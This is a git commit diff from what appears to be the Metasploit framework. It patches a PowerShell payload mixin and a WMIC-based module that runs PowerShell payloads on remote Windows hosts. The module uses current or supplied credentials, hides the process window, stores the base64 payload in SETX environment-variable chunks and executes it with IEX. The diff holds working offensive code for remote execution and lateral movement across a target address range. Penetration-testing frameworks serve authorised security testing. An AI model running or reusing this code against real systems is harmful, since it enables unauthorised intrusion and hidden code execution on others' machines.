Correct powershell

bug/bundler_fix
Meatballs 2013-09-20 18:36:24 +01:00
parent 9819566d94
commit 7d1c5c732a
2 changed files with 15 additions and 24 deletions

View File

@ -116,7 +116,7 @@ module Exploit::Powershell
ps_wrapper = <<EOS ps_wrapper = <<EOS
$si = New-Object System.Diagnostics.ProcessStartInfo $si = New-Object System.Diagnostics.ProcessStartInfo
$si.FileName = '#{ps_bin}' $si.FileName = #{ps_bin}
$si.Arguments = '#{ps_args}' $si.Arguments = '#{ps_args}'
$si.UseShellExecute = $false $si.UseShellExecute = $false
$si.RedirectStandardOutput = $true $si.RedirectStandardOutput = $true
@ -146,7 +146,7 @@ EOS
psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};" psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
end end
# Determine appropriate architecture # Determine appropriate architecture
ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe' ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
# Wrap in hidden runtime # Wrap in hidden runtime
psh_payload = run_hidden_psh(psh_payload,ps_bin) psh_payload = run_hidden_psh(psh_payload,ps_bin)
# Convert to base64 for -encodedcommand execution # Convert to base64 for -encodedcommand execution

View File

@ -20,7 +20,8 @@ class Metasploit3 < Msf::Exploit::Local
This module executes powershell on the remote host using the current This module executes powershell on the remote host using the current
user credentials or those supplied. Instead of using PSEXEC over TCP user credentials or those supplied. Instead of using PSEXEC over TCP
port 445 we use the WMIC command to start a Remote Procedure Call on port 445 we use the WMIC command to start a Remote Procedure Call on
TCP port 135 and an ephemeral port. TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel
traffic through that session.
The result is similar to psexec but with the added benefit of using The result is similar to psexec but with the added benefit of using
the session's current authentication token instead of having to know the session's current authentication token instead of having to know
@ -29,6 +30,9 @@ class Metasploit3 < Msf::Exploit::Local
We do not get feedback from the WMIC command so there are no We do not get feedback from the WMIC command so there are no
indicators of success or failure. The remote host must be configured indicators of success or failure. The remote host must be configured
to allow remote Windows Management Instrumentation. to allow remote Windows Management Instrumentation.
N.B. This module will not work with the local administrator account
due to the way the environment variables are stored as SYSTEM acc.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'Author' => [
@ -61,6 +65,8 @@ class Metasploit3 < Msf::Exploit::Local
OptString.new('SMBPass', [ false, 'The password for the specified username' ]), OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]), OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]),
OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]), OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]),
# Move this out of advanced
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener'])
]) ])
end end
@ -70,6 +76,10 @@ class Metasploit3 < Msf::Exploit::Local
end end
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server| Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
# TODO: CHECK WMIC Access by reading the clipboard?
# TODO: wmic /output:clipboard
# TODO: Needs to be meterpreter ext side due to threading
# Get the PSH Payload and split it into bitesize chunks # Get the PSH Payload and split it into bitesize chunks
# 1024 appears to be the max value allowed in env vars # 1024 appears to be the max value allowed in env vars
psh = cmd_psh_payload(payload.encoded).gsub("\r\n","") psh = cmd_psh_payload(payload.encoded).gsub("\r\n","")
@ -81,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Local
env_vars = [] env_vars = []
0.upto(chunks.length-1) do |i| 0.upto(chunks.length-1) do |i|
env_vars << "#{env_name}#{i}" env_vars << "#{env_name}#{i}"
c = "cmd /c SETX #{setx_user_pass_string}#{env_vars[i]} \"#{chunks[i]}\"" c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\""
wmic_command(server, c) wmic_command(server, c)
end end
@ -89,12 +99,10 @@ class Metasploit3 < Msf::Exploit::Local
env_vars.each do |env| env_vars.each do |env|
exec_cmd << "+$env:#{env}" exec_cmd << "+$env:#{env}"
end end
exec_cmd << ";$x >> c:\\parp.txt;IEX $x;" exec_cmd << ";IEX $x;"
print_status("[#{server}] Executing payload") print_status("[#{server}] Executing payload")
sleep(10)
wmic_command(server, exec_cmd) wmic_command(server, exec_cmd)
sleep(10)
print_status("[#{server}] Cleaning up environment variables") print_status("[#{server}] Cleaning up environment variables")
env_vars.each do |env| env_vars.each do |env|
@ -104,23 +112,6 @@ class Metasploit3 < Msf::Exploit::Local
end end
end end
# If we are local administrator then environment variables are stored as
# SYSTEM in S-1-5-18 instead of the Administrator -500 HKCU store so we
# need to ensure we set the env vars for the current user!
def setx_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
userpass = ""
unless user.nil?
if domain.nil?
userpass = "/s 127.0.0.1 /u #{user} /p #{pass} "
else
userpass = "/s 127.0.0.1 /u #{domain}\\#{user} /p #{pass} "
end
end
return userpass
end
def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass']) def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
userpass = "" userpass = ""